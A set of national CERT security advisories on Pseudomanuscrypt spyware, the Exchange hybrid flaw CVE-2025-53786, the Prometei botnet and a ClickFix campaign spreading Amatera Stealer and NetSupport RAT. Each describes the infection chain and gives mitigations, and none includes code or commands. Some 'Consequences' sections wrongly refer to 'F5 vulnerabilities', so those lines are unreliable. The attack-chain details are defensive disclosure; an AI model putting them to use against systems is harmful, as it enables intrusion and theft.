Advisory ID:   ngCERT-2025-110003

SUMMARY

ngCERT is issuing an alert on the infiltration of Pseudomanuscrypt malware, a sophisticated spyware campaign primarily impacting Windows OS. Notably, this mass-scale operation has infected over 35,000 systems globally, focusing mainly on industrial control systems (ICS) and government entities. Particularly, Pseudomanuscrypt infiltration can lead to theft of sensitive credentials and data, potentially enabling follow-on ransomware attacks, financial fraud, and possible sabotage of critical infrastructure across various sectors. This underscores the need for individuals and organisations to take proactive steps to safeguard against Pseudomanuscrypt infiltration.

Damage:      Critical

Probability:  High 

Platform(s): Microsoft Windows (OS)

DESCRIPTION

Attackers spread Pseudomanuscrypt mainly through fake pirated software installers and cracks downloaded from malicious sites, often sourced from Malware-as-a-Service platforms or delivered through botnets like Glupteba. Once downloaded, a 7z self-extracting archive drops loaders (install.dll and install.dat) into the %TEMP% folder, decodes shellcode, and launches the main payload while creating persistence through registry keys and scheduled tasks. The malware subsequently establishes resilient command-and-control communication using KCP protocol or DNS tunnelling, backed by a Domain Generation Algorithm to evade blocking. After gaining a foothold, it performs extensive reconnaissance, including logging keystrokes, capturing screenshots and video, stealing credentials and clipboard data, while monitoring VPNs, and mapping the network. It also pulls additional modules for deeper espionage or secondary infections, such as cryptocurrency miners.

CONSEQUENCES

A successful Pseudomanuscrypt malware infection can lead to:

1. Theft of sensitive credentials, intellectual property, and operational data.
2. Financial losses through fraud.
3. Ransomware attacks.
4. Sabotage and disruption of critical services and infrastructure.
5. Reputational damage

SOLUTION/MITIGATION

ngCERT recommends the following prioritised actions:

1. Patch and update all systems, especially Windows and ICS software, disable unnecessary services and enforce least-privilege access.
2. Deploy reputable antivirus solutions with behavioural detection configured for real-time scanning. Enable application whitelisting to block unauthorised executables.
3. Avoid downloading cracked or pirated software; verify sources and use official channels. Educate users on phishing and malicious archives through regular awareness training.
4. Implement EDR tools to detect anomalous behaviours like unusual C2 traffic. Segment ICS networks and monitor for persistence artifacts in %TEMP% and registry hives.
5. If infected, isolate affected systems, scan with reputable tools, and reset credentials. Report incidents to ngCERT for coordinated response.

HYPERLINK

• https://breachspot.com/news/cyber-attacks/pseudomanuscrypt-malware-spreads-like-cryptbot-targeting-korean-users/
• https://thehackernews.com/2022/02/pseudomanuscrypt-malware-spreading-same.html
• https://thrive.trellix.com/s/article/KB95251?language=en_US
• https://thehackernews.com/2025/08/microsoft-discloses-exchange-server.html

Advisory ID:   ngCERT-2025-110004

SUMMARY

ngCERT is aware of a high-severity vulnerability which combines elements of CWE-287 (Improper Authentication) with a privilege escalation path identified in Microsoft Exchange Server hybrid deployments. This deployment connects on-premises Exchange servers to Exchange Online within Microsoft 365. The flaw dubbed CVE-2025-53786 arises from weak authentication trust established between the two environments through a shared service principal. Attackers could exploit this weakness if they already hold administrative privileges on-premises and abuse this trust relationship to escalate privileges into the connected cloud environment. Consequently, individuals and organisations are advised to take immediate steps to protect their systems from exploitation by threat actors.

Damage:      Critical

Probability:  High 

Platform(s): Microsoft Exchange Server (Hybrid Deployments)

DESCRIPTION

CVE-2025-53786 stems from improper authentication handling in hybrid Microsoft Exchange Server environments that link on-premises servers with Exchange Online. The flaw affects hybrid Microsoft Exchange setups and combines elements of CWE-287 (Improper Authentication) with a privilege escalation path. Threat actors with elevated privileges on the on-premises Exchange environment can exploit these weaknesses to request or forge tokens, thereby elevating their effective privileges in the cloud and gaining access to cloud services. This movement may occur without typical logging or controls catching the activity, complicating detection and response. Affected systems include Exchange Server 2016, 2019, and Subscription Edition that have not applied Microsoft’s April 2025 hybrid configuration update. Organisations are advised to apply the April 2025 or later Exchange Server hotfix to avoid being vulnerable to cross-environment privilege escalation.

CONSEQUENCES

Successful exploitation of F5 vulnerabilities could result in:

1. Privilege escalation
2. System compromise
3. Persistence across environments
4. Unauthorised cloud account access/takeover
5. Data Exfiltration
6. Lateral movement across a connected cloud environment
7. Data tampering
8. Reputational Damage

SOLUTION/MITIGATION

ngCERT recommends the following:

1. Install the April 2025 or later Exchange Server hotfix on all on-premises servers in hybrid environments.
2. Reconfigure the hybrid deployment to use a dedicated hybrid application in Entra ID instead of the legacy shared service principal model.
3. Implement Microsoft’s Service Principal Clean-Up Mode to revoke and regenerate hybrid service principal credentials.
4. Audit on-premises Exchange settings for hybrid status, update levels, shared principal use, admin access, and abnormal authentication activity.
5. Restrict administrative privileges with the least privilege, enforce MFA, and monitor for suspicious admin activity.
6. Implement logging and alerting for suspicious token requests, credential changes, and cross-environment access anomalies.
7. If immediate patching isn’t possible, apply compensating controls like isolating the Exchange server, limiting outbound traffic, and monitoring hybrid token flows.

HYPERLINK

• https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53786
• https://www.cisa.gov/news-events/alerts/2025/08/06/microsoft-releases-guidance-high-severity-vulnerability-cve-2025-53786-hybrid-exchange-deployments
• https://techcommunity.microsoft.com/blog/vulnerability-management/mdvm-guidance-for-cve-2025-53786-exchange-hybrid-privilege-escalation/4442337
• https://thehackernews.com/2025/08/microsoft-discloses-exchange-server.html

Advisory ID:   ngCERT-2025-110002

SUMMARY

ngCERT is aware of widespread malicious activities linked to the Prometei botnet affecting multiple network infrastructures within Nigeria’s cyberspace. Prometei is a modular malware that targets Windows and Linux servers for credential theft, cryptocurrency mining, and proxy exploitation. Reports indicate that the malware exploits unpatched systems, weak authentication, and exposed services such as Server Message Block (SMB) and Remote Desktop Protocol (RDP). Notably, infections have been observed across finance, education, telecommunications and energy sectors, with implications for prolonged network compromise, large-scale credential harvesting, and use of infected systems as proxies for further attacks. Consequently, organisations are urged to strengthen patching routines, improve authentication security, and monitor for unusual system resource usage.

Damage:      Critical

Probability:  High 

Platform(s): Windows and Linux Servers

DESCRIPTION

Prometei is a sophisticated, self-updating botnet with modular plugins that enable the targeting of both Windows and Linux environments. Initial access is achieved by exploiting exposed services, primarily Microsoft Exchange Server vulnerabilities (ProxyLogon/ProxyShell chains) and weak or default RDP/SSH credentials, among others. Also, brute-force attacks against SMB, RDP, and MSSQL are common vectors. Successful Prometei infiltration exploitation will deliver executable files such as (svchost.exe or systemd-journald) disguised as legitimate system files to escalate privileges using exploits like PrintNightmare or EternalBlue variants, and disable security tools. The malware uses domain generation algorithms (DGA), HTTP/HTTPS over non-standard ports mimicking legitimate traffic, and in newer variants, routes communication through Tor. Furthermore, it aggressively steals credentials, spreads laterally across networks and simultaneously turns infected systems into high-performance Monero miners. It also installs SOCKS5/HTTP proxies for resale on underground markets, and exfiltrates browser passwords and VPN configurations.

CONSEQUENCES

Successful exploitation of F5 vulnerabilities could result in:

1. Severe performance degradation.
2. Data breach.
3. System compromise.
4. Financial losses.
5. Exposure of national networks to global cybercrime operations.

SOLUTION/MITIGATION

ngCERT recommends the following:

1. Apply critical patches; disable legacy services like SMBv1.
2. Enforce MFA and strong password policies.
3. Segment networks and limit administrative access.
4. Deploy EDR/XDR to detect abnormal processes and C2 traffic.
5.  Monitor for CPU spikes, mining processes, and failed login attempts. 
6. Conduct regular audits and access reviews.
7. Isolate infected hosts and reset exposed credentials.
8. Train staff on identifying early indicators of compromise.

HYPERLINK

• https://any.run/malware-trends/prometei/
• https://cybersecuritynews.com/prometei-botnet-attacking-linux-servers/
• https://unit42.paloaltonetworks.com/prometei-botnet-2025-activity/

Advisory ID: NCC-CSIRT-2025-026

Summary: 

Security researchers (eSentire, The Hacker News coverage) have identified a November 2025 campaign, tracked as EVALUSION, that uses the ClickFix social-engineering technique to trick users into executing commands which lead to the installation of the Amatera Stealer (packed with PureCrypter) and the follow-on deployment of NetSupport RAT. The attack chain injects a packed Amatera DLL into MSBuild.exe, harvests browser and wallet data, then executes PowerShell to fetch and run NetSupport for persistent remote access.

Damage/Probability: High/High

Indicators of Compromise (IOCs): 

IOCs change rapidly. Pull up-to-date lists from vendor CTI and your telemetry before actioning.

• Run/explorer.exe spawning msbuild.exe with injected DLLs.
• Unknown DLLs loaded into msbuild.exe or other trusted developer processes.
• PureCrypter artifacts and PowerShell one-liners contacting suspicious domains.
• NetSupport RAT beacons or console connections to unknown endpoints.
• Outbound connections to vendor-flagged malicious download/C2 domains.

Product(s): 

• Microsoft Windows endpoints (workstations and servers)
• Browsers and browser-stored credentials (Chrome, Edge, Firefox) and password managers
• NetSupport RAT (remote access tooling abused as payload)
• Amatera Stealer (infostealer family) and PureCrypter (loader/crypter)

Version(s): 

Not version-specific, it affects Windows systems where users execute the staged payloads; detection and remediation depend on endpoint protections and configuration.

Platform(s): 

• Enterprise and unmanaged Windows hosts
• Remote workers’ machines
• Environments where MSBuild.exe and PowerShell are allowed to run.

Description: 

The campaign begins with phishing, malvertising, or compromised pages that present a ClickFix-style visual or instruction prompting the user to run a command (the “ClickFix” interaction), often via the Windows Run box or a similarly trivial user action. ClickFix is an interactive social-engineering technique designed to coax users into executing commands that would normally be blocked or inspected. Once the user follows the prompt, the chain drops a PureCrypter-packed Amatera DLL, which the actor injects into MSBuild.exe to evade detection. The stealer harvests browser credentials, cookies, crypto wallets and system artifacts, then executes a PowerShell stage that downloads and installs NetSupport RAT to provide remote control to the attacker.

Threat Types: 

• Infostealer (Amatera): credential, cookie and crypto-wallet harvesting.
• Remote Access Trojan (NetSupport): full remote control and lateral movement.
• Social-engineering vector: ClickFix (interactive user trick that bypasses some security controls).
• Crypter/loader use (PureCrypter) to evade detection. (Proofpoint)

Impacts: 

• Theft of browser passwords, cookies, form data, and crypto wallets.
• NetSupport RAT enables remote access and data exfiltration.
• Crypter packing and DLL injection evade signature-based detection.
• Unmanaged endpoints with corporate resources increase operational risk.

Solutions:  

NCC-CSIRT recommend the following mitigation steps:

• Hunt exe for unknown DLLs or unusual process chains.
• Monitor PowerShell for download-execute or encoded scripts.
• Check browsers for unexpected children or credential access.
• Block & alert on domains/IPs linked to PureCrypter, Amatera, NetSupport.
• Sandbox suspicious attachments/pages with interactive Run patterns.
• Quarantine endpoints and block known malicious domains from CTI feeds.
• Enforce execution controls: restrict msbuild.exe, constrain PowerShell, block unsigned scripts.
• Rotate credentials, force reauthentication, and reset MFA if compromised.

References:

• https://thehackernews.com/2025/11/new-evalusion-clickfix-campaign.html

• https://www.esentire.com/blog/unpacking-netsupport-rat-loaders-delivered-via-clickfix

• https://www.proofpoint.com/au/blog/threat-insight/amatera-stealer-rebranded-acr-stealer-improved-evasion-sophistication

• https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/